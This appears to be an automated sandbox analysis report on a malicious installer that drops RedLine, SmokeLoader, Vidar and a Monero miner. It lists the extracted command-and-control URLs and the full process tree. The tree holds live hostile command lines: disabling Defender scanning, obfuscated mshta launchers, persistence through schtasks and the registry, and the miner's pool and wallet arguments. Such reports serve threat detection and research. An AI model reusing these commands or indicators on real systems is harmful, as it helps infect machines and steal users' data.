Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
02-12-2021 07:35
211202-je6zgsfge4 1010-09-2021 20:31
210910-za2rzaaeh3 1010-09-2021 19:40
210910-ydvmdsdffp 1010-09-2021 12:06
210910-n9s4bsdbep 1010-09-2021 05:37
210910-gbjcxahdh2 1009-09-2021 22:16
210909-17av7aghb7 1009-09-2021 22:12
210909-14mqksgha9 1009-09-2021 22:12
210909-14l42sgha8 1009-09-2021 22:11
210909-14e1qsgha7 1009-09-2021 22:11
210909-138lnacacn 10Analysis
-
max time kernel
16s -
max time network
524s -
platform
windows7_x64 -
resource
win7-de -
submitted
09-09-2021 22:12
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
General
-
Target
setup_x86_x64_install.exe
-
Size
4.3MB
-
MD5
6d18c8e8ab9051f7a70b89ff7bb0ec35
-
SHA1
265311e2afd9f59e824f4b77162cf3dfa278eb7e
-
SHA256
8fe6c86b038ce91a991fe6eb8a9b323bb37b554ff6b4e5c18de3fe52d4aedf6d
-
SHA512
249bf79dc90d4662b942c7eed2a7b7816b749f6d5f7bc190bba05f826fa143d0b44f58054d8649b8626884c5fcbd1cea8abd625dc701d44b7aaac84fc74e47ff
Malware Config
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
redline
pab123
45.14.49.169:22411
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2932 2668 rundll32.exe 62 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2212 2668 rundll32.exe 62 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4940 2668 rundll32.exe 62 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral4/memory/1916-231-0x0000000002D00000-0x0000000002D1F000-memory.dmp family_redline behavioral4/memory/1916-245-0x00000000033D0000-0x00000000033EE000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
resource yara_rule behavioral4/files/0x0001000000012f0a-93.dat family_socelars behavioral4/files/0x0001000000012f0a-121.dat family_socelars behavioral4/files/0x0001000000012f0a-102.dat family_socelars -
Vidar Stealer 1 IoCs
resource yara_rule behavioral4/memory/3060-300-0x0000000000400000-0x0000000002BC5000-memory.dmp family_vidar -
resource yara_rule behavioral4/files/0x0001000000012efd-69.dat aspack_v212_v242 behavioral4/files/0x0001000000012efd-70.dat aspack_v212_v242 behavioral4/files/0x0001000000012efc-71.dat aspack_v212_v242 behavioral4/files/0x0001000000012efc-72.dat aspack_v212_v242 behavioral4/files/0x0001000000012eff-75.dat aspack_v212_v242 behavioral4/files/0x0001000000012eff-76.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 15 IoCs
pid Process 1980 setup_installer.exe 1504 setup_install.exe 280 Thu21a1ef054cac78a.exe 1916 Thu21624565bb917a.exe 1580 Thu219d5fe8cf316.exe 1996 Thu21b93295136197.exe 1560 Thu2164f292a11ce.exe 1220 Thu21b9847cb6727.exe 2088 Thu21df5caa1b78de6.exe 2200 ultramediaburner.exe 2176 setup_2.tmp 2232 Thu214aaca5625.exe 2268 Thu2156de5489c19.exe 2280 Thu21b93295136197.tmp 2348 Thu214aaca5625.tmp -
Loads dropped DLL 45 IoCs
pid Process 1080 setup_x86_x64_install.exe 1980 setup_installer.exe 1980 setup_installer.exe 1980 setup_installer.exe 1980 setup_installer.exe 1980 setup_installer.exe 1980 setup_installer.exe 1504 setup_install.exe 1504 setup_install.exe 1504 setup_install.exe 1504 setup_install.exe 1504 setup_install.exe 1504 setup_install.exe 1504 setup_install.exe 1504 setup_install.exe 1176 cmd.exe 964 cmd.exe 964 cmd.exe 1056 cmd.exe 1456 cmd.exe 1916 Thu21624565bb917a.exe 1916 Thu21624565bb917a.exe 1128 cmd.exe 1996 Thu21b93295136197.exe 1996 Thu21b93295136197.exe 1276 cmd.exe 1276 cmd.exe 1020 cmd.exe 1020 cmd.exe 1560 Thu2164f292a11ce.exe 1560 Thu2164f292a11ce.exe 2072 cmd.exe 2088 Thu21df5caa1b78de6.exe 2088 Thu21df5caa1b78de6.exe 2124 cmd.exe 1432 cmd.exe 2200 ultramediaburner.exe 2200 ultramediaburner.exe 1872 cmd.exe 1996 Thu21b93295136197.exe 2232 Thu214aaca5625.exe 2232 Thu214aaca5625.exe 280 Thu21a1ef054cac78a.exe 280 Thu21a1ef054cac78a.exe 2232 Thu214aaca5625.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 5052 icacls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 271 freegeoip.app 20 ipinfo.io 83 ipinfo.io 157 ipinfo.io 269 freegeoip.app 285 api.2ip.ua 286 api.2ip.ua 12 ip-api.com 154 ipinfo.io 272 freegeoip.app 274 freegeoip.app -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
pid pid_target Process procid_target 2940 2356 WerFault.exe 73 1460 2812 WerFault.exe 96 2896 2172 WerFault.exe 117 2244 1780 WerFault.exe 152 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3408 schtasks.exe 2364 schtasks.exe 3376 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3524 timeout.exe -
Kills process with taskkill 8 IoCs
pid Process 5052 taskkill.exe 2936 taskkill.exe 5080 taskkill.exe 808 taskkill.exe 2440 taskkill.exe 2024 taskkill.exe 3280 taskkill.exe 3376 taskkill.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 3760 PING.EXE 3976 PING.EXE -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 84 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 86 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 156 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeCreateTokenPrivilege 280 Thu21a1ef054cac78a.exe Token: SeAssignPrimaryTokenPrivilege 280 Thu21a1ef054cac78a.exe Token: SeLockMemoryPrivilege 280 Thu21a1ef054cac78a.exe Token: SeIncreaseQuotaPrivilege 280 Thu21a1ef054cac78a.exe Token: SeMachineAccountPrivilege 280 Thu21a1ef054cac78a.exe Token: SeTcbPrivilege 280 Thu21a1ef054cac78a.exe Token: SeSecurityPrivilege 280 Thu21a1ef054cac78a.exe Token: SeTakeOwnershipPrivilege 280 Thu21a1ef054cac78a.exe Token: SeLoadDriverPrivilege 280 Thu21a1ef054cac78a.exe Token: SeSystemProfilePrivilege 280 Thu21a1ef054cac78a.exe Token: SeSystemtimePrivilege 280 Thu21a1ef054cac78a.exe Token: SeProfSingleProcessPrivilege 280 Thu21a1ef054cac78a.exe Token: SeIncBasePriorityPrivilege 280 Thu21a1ef054cac78a.exe Token: SeCreatePagefilePrivilege 280 Thu21a1ef054cac78a.exe Token: SeCreatePermanentPrivilege 280 Thu21a1ef054cac78a.exe Token: SeBackupPrivilege 280 Thu21a1ef054cac78a.exe Token: SeRestorePrivilege 280 Thu21a1ef054cac78a.exe Token: SeShutdownPrivilege 280 Thu21a1ef054cac78a.exe Token: SeDebugPrivilege 280 Thu21a1ef054cac78a.exe Token: SeAuditPrivilege 280 Thu21a1ef054cac78a.exe Token: SeSystemEnvironmentPrivilege 280 Thu21a1ef054cac78a.exe Token: SeChangeNotifyPrivilege 280 Thu21a1ef054cac78a.exe Token: SeRemoteShutdownPrivilege 280 Thu21a1ef054cac78a.exe Token: SeUndockPrivilege 280 Thu21a1ef054cac78a.exe Token: SeSyncAgentPrivilege 280 Thu21a1ef054cac78a.exe Token: SeEnableDelegationPrivilege 280 Thu21a1ef054cac78a.exe Token: SeManageVolumePrivilege 280 Thu21a1ef054cac78a.exe Token: SeImpersonatePrivilege 280 Thu21a1ef054cac78a.exe Token: SeCreateGlobalPrivilege 280 Thu21a1ef054cac78a.exe Token: 31 280 Thu21a1ef054cac78a.exe Token: 32 280 Thu21a1ef054cac78a.exe Token: 33 280 Thu21a1ef054cac78a.exe Token: 34 280 Thu21a1ef054cac78a.exe Token: 35 280 Thu21a1ef054cac78a.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1080 wrote to memory of 1980 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1980 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1980 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1980 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1980 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1980 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1980 1080 setup_x86_x64_install.exe 28 PID 1980 wrote to memory of 1504 1980 setup_installer.exe 31 PID 1980 wrote to memory of 1504 1980 setup_installer.exe 31 PID 1980 wrote to memory of 1504 1980 setup_installer.exe 31 PID 1980 wrote to memory of 1504 1980 setup_installer.exe 31 PID 1980 wrote to memory of 1504 1980 setup_installer.exe 31 PID 1980 wrote to memory of 1504 1980 setup_installer.exe 31 PID 1980 wrote to memory of 1504 1980 setup_installer.exe 31 PID 1504 wrote to memory of 788 1504 setup_install.exe 33 PID 1504 wrote to memory of 788 1504 setup_install.exe 33 PID 1504 wrote to memory of 788 1504 setup_install.exe 33 PID 1504 wrote to memory of 788 1504 setup_install.exe 33 PID 1504 wrote to memory of 788 1504 setup_install.exe 33 PID 1504 wrote to memory of 788 1504 setup_install.exe 33 PID 1504 wrote to memory of 788 1504 setup_install.exe 33 PID 1504 wrote to memory of 1056 1504 setup_install.exe 34 PID 1504 wrote to memory of 1056 1504 setup_install.exe 34 PID 1504 wrote to memory of 1056 1504 setup_install.exe 34 PID 1504 wrote to memory of 1056 1504 setup_install.exe 34 PID 1504 wrote to memory of 1056 1504 setup_install.exe 34 PID 1504 wrote to memory of 1056 1504 setup_install.exe 34 PID 1504 wrote to memory of 1056 1504 setup_install.exe 34 PID 1504 wrote to memory of 964 1504 setup_install.exe 35 PID 1504 wrote to memory of 964 1504 setup_install.exe 35 PID 1504 wrote to memory of 964 1504 setup_install.exe 35 PID 1504 wrote to memory of 964 1504 setup_install.exe 35 PID 1504 wrote to memory of 964 1504 setup_install.exe 35 PID 1504 wrote to memory of 964 1504 setup_install.exe 35 PID 1504 wrote to memory of 964 1504 setup_install.exe 35 PID 1504 wrote to memory of 1176 1504 setup_install.exe 36 PID 1504 wrote to memory of 1176 1504 setup_install.exe 36 PID 1504 wrote to memory of 1176 1504 setup_install.exe 36 PID 1504 wrote to memory of 1176 1504 setup_install.exe 36 PID 1504 wrote to memory of 1176 1504 setup_install.exe 36 PID 1504 wrote to memory of 1176 1504 setup_install.exe 36 PID 1504 wrote to memory of 1176 1504 setup_install.exe 36 PID 1504 wrote to memory of 1276 1504 setup_install.exe 37 PID 1504 wrote to memory of 1276 1504 setup_install.exe 37 PID 1504 wrote to memory of 1276 1504 setup_install.exe 37 PID 1504 wrote to memory of 1276 1504 setup_install.exe 37 PID 1504 wrote to memory of 1276 1504 setup_install.exe 37 PID 1504 wrote to memory of 1276 1504 setup_install.exe 37 PID 1504 wrote to memory of 1276 1504 setup_install.exe 37 PID 1504 wrote to memory of 1456 1504 setup_install.exe 38 PID 1504 wrote to memory of 1456 1504 setup_install.exe 38 PID 1504 wrote to memory of 1456 1504 setup_install.exe 38 PID 1504 wrote to memory of 1456 1504 setup_install.exe 38 PID 1504 wrote to memory of 1456 1504 setup_install.exe 38 PID 1504 wrote to memory of 1456 1504 setup_install.exe 38 PID 1504 wrote to memory of 1456 1504 setup_install.exe 38 PID 1176 wrote to memory of 280 1176 cmd.exe 39 PID 1176 wrote to memory of 280 1176 cmd.exe 39 PID 1176 wrote to memory of 280 1176 cmd.exe 39 PID 1176 wrote to memory of 280 1176 cmd.exe 39 PID 1176 wrote to memory of 280 1176 cmd.exe 39 PID 1176 wrote to memory of 280 1176 cmd.exe 39 PID 1176 wrote to memory of 280 1176 cmd.exe 39 PID 1504 wrote to memory of 1128 1504 setup_install.exe 61
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:788
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:824
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu219d5fe8cf316.exe4⤵
- Loads dropped DLL
PID:1056 -
C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\Thu219d5fe8cf316.exeThu219d5fe8cf316.exe5⤵
- Executes dropped EXE
PID:1580 -
C:\ProgramData\3202733.exe"C:\ProgramData\3202733.exe"6⤵PID:3744
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:3872
-
-
-
C:\ProgramData\2732532.exe"C:\ProgramData\2732532.exe"6⤵PID:3844
-
-
C:\ProgramData\4817941.exe"C:\ProgramData\4817941.exe"6⤵PID:3912
-
-
C:\ProgramData\4494678.exe"C:\ProgramData\4494678.exe"6⤵PID:4040
-
-
C:\ProgramData\4171414.exe"C:\ProgramData\4171414.exe"6⤵PID:3388
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE(creatEoBjECT ( "wScRiPt.shELl"). RuN ("CMD /c TypE ""C:\ProgramData\4171414.exe"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if """" =="""" for %B iN ( ""C:\ProgramData\4171414.exe"" ) do taskkill /Im ""%~NxB"" /F " ,0 , tRUe) )7⤵PID:3120
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\ProgramData\4171414.exe"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "" =="" for %B iN ( "C:\ProgramData\4171414.exe" ) do taskkill /Im "%~NxB" /F8⤵PID:3656
-
C:\Windows\SysWOW64\taskkill.exetaskkill /Im "4171414.exe" /F9⤵
- Kills process with taskkill
PID:3376
-
-
C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXEGZ9~4QZ~O.EXe -P6_oIH__Ioj5q9⤵PID:1876
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE(creatEoBjECT ( "wScRiPt.shELl"). RuN ("CMD /c TypE ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if ""-P6_oIH__Ioj5q "" =="""" for %B iN ( ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" ) do taskkill /Im ""%~NxB"" /F " ,0 , tRUe) )10⤵PID:2284
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "-P6_oIH__Ioj5q " =="" for %B iN ( "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE" ) do taskkill /Im "%~NxB" /F11⤵PID:948
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" T~DJNB.F -u /S10⤵PID:4480
-
-
-
-
-
-
C:\ProgramData\7293052.exe"C:\ProgramData\7293052.exe"6⤵PID:1780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 18207⤵
- Program crash
PID:2244
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21624565bb917a.exe4⤵
- Loads dropped DLL
PID:964 -
C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\Thu21624565bb917a.exeThu21624565bb917a.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1916
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21a1ef054cac78a.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\Thu21a1ef054cac78a.exeThu21a1ef054cac78a.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:280 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:736
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:808
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2164f292a11ce.exe4⤵
- Loads dropped DLL
PID:1276 -
C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\Thu2164f292a11ce.exeThu2164f292a11ce.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b93295136197.exe4⤵
- Loads dropped DLL
PID:1456 -
C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\Thu21b93295136197.exeThu21b93295136197.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214ce31cede21.exe4⤵PID:1584
-
C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\Thu214ce31cede21.exeThu214ce31cede21.exe5⤵PID:3060
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Thu214ce31cede21.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\Thu214ce31cede21.exe" & del C:\ProgramData\*.dll & exit6⤵PID:3212
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Thu214ce31cede21.exe /f7⤵
- Kills process with taskkill
PID:3280
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:3524
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21df5caa1b78de6.exe /mixone4⤵
- Loads dropped DLL
PID:1020 -
C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\Thu21df5caa1b78de6.exeThu21df5caa1b78de6.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2088 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Thu21df5caa1b78de6.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\Thu21df5caa1b78de6.exe" & exit6⤵PID:2228
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Thu21df5caa1b78de6.exe" /f7⤵
- Kills process with taskkill
PID:2024
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21568b0ab8.exe4⤵
- Loads dropped DLL
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\Thu21568b0ab8.exeThu21568b0ab8.exe5⤵PID:2176
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:692
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:2160
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:3360
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:3408
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:3468
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:3172
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:3376
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:2260
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:4972
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵PID:2036
-
C:\ProgramData\7333427.exe"C:\ProgramData\7333427.exe"8⤵PID:2812
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2812 -s 17369⤵
- Program crash
PID:1460
-
-
-
C:\ProgramData\2499647.exe"C:\ProgramData\2499647.exe"8⤵PID:2972
-
-
C:\ProgramData\1274141.exe"C:\ProgramData\1274141.exe"8⤵PID:1516
-
-
C:\ProgramData\2029446.exe"C:\ProgramData\2029446.exe"8⤵PID:2660
-
-
C:\ProgramData\4085467.exe"C:\ProgramData\4085467.exe"8⤵PID:2936
-
-
C:\ProgramData\2801186.exe"C:\ProgramData\2801186.exe"8⤵PID:2172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 17849⤵
- Program crash
PID:2896
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:2356
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2356 -s 13928⤵
- Program crash
PID:2940
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:1260
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:3068
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:2440
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵PID:1928
-
-
C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"7⤵PID:820
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:1008
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\WINsoft\43523.bat" "9⤵PID:2164
-
C:\Users\Admin\AppData\Roaming\WINsoft\HWI.exeHWI.exe10⤵PID:2224
-
C:\Users\Admin\AppData\Roaming\WINsoft\HWI.exeHWI.exe11⤵PID:2032
-
-
-
C:\Users\Admin\AppData\Roaming\WINsoft\FoxyIDM62s.exeFoxyIDM62s.exe10⤵PID:1976
-
C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp"C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"11⤵PID:1632
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:2096
-
C:\Users\Admin\AppData\Local\Temp\is-1TMPE.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-1TMPE.tmp\setup_2.tmp" /SL5="$301FC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:2796
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵PID:984
-
C:\Users\Admin\AppData\Local\Temp\is-GGU5G.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-GGU5G.tmp\setup_2.tmp" /SL5="$701F6,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
PID:2176 -
C:\Users\Admin\AppData\Local\Temp\is-39OAE.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-39OAE.tmp\postback.exe" ss111⤵PID:2860
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵PID:2504
-
C:\Users\Admin\AppData\Local\Temp\SjFxwkHLZ.exe"C:\Users\Admin\AppData\Local\Temp\SjFxwkHLZ.exe"13⤵PID:3564
-
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"14⤵PID:3812
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe" /F15⤵
- Creates scheduled task(s)
PID:2364
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\15⤵PID:4060
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\16⤵PID:2404
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:2696
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:2944
-
-
-
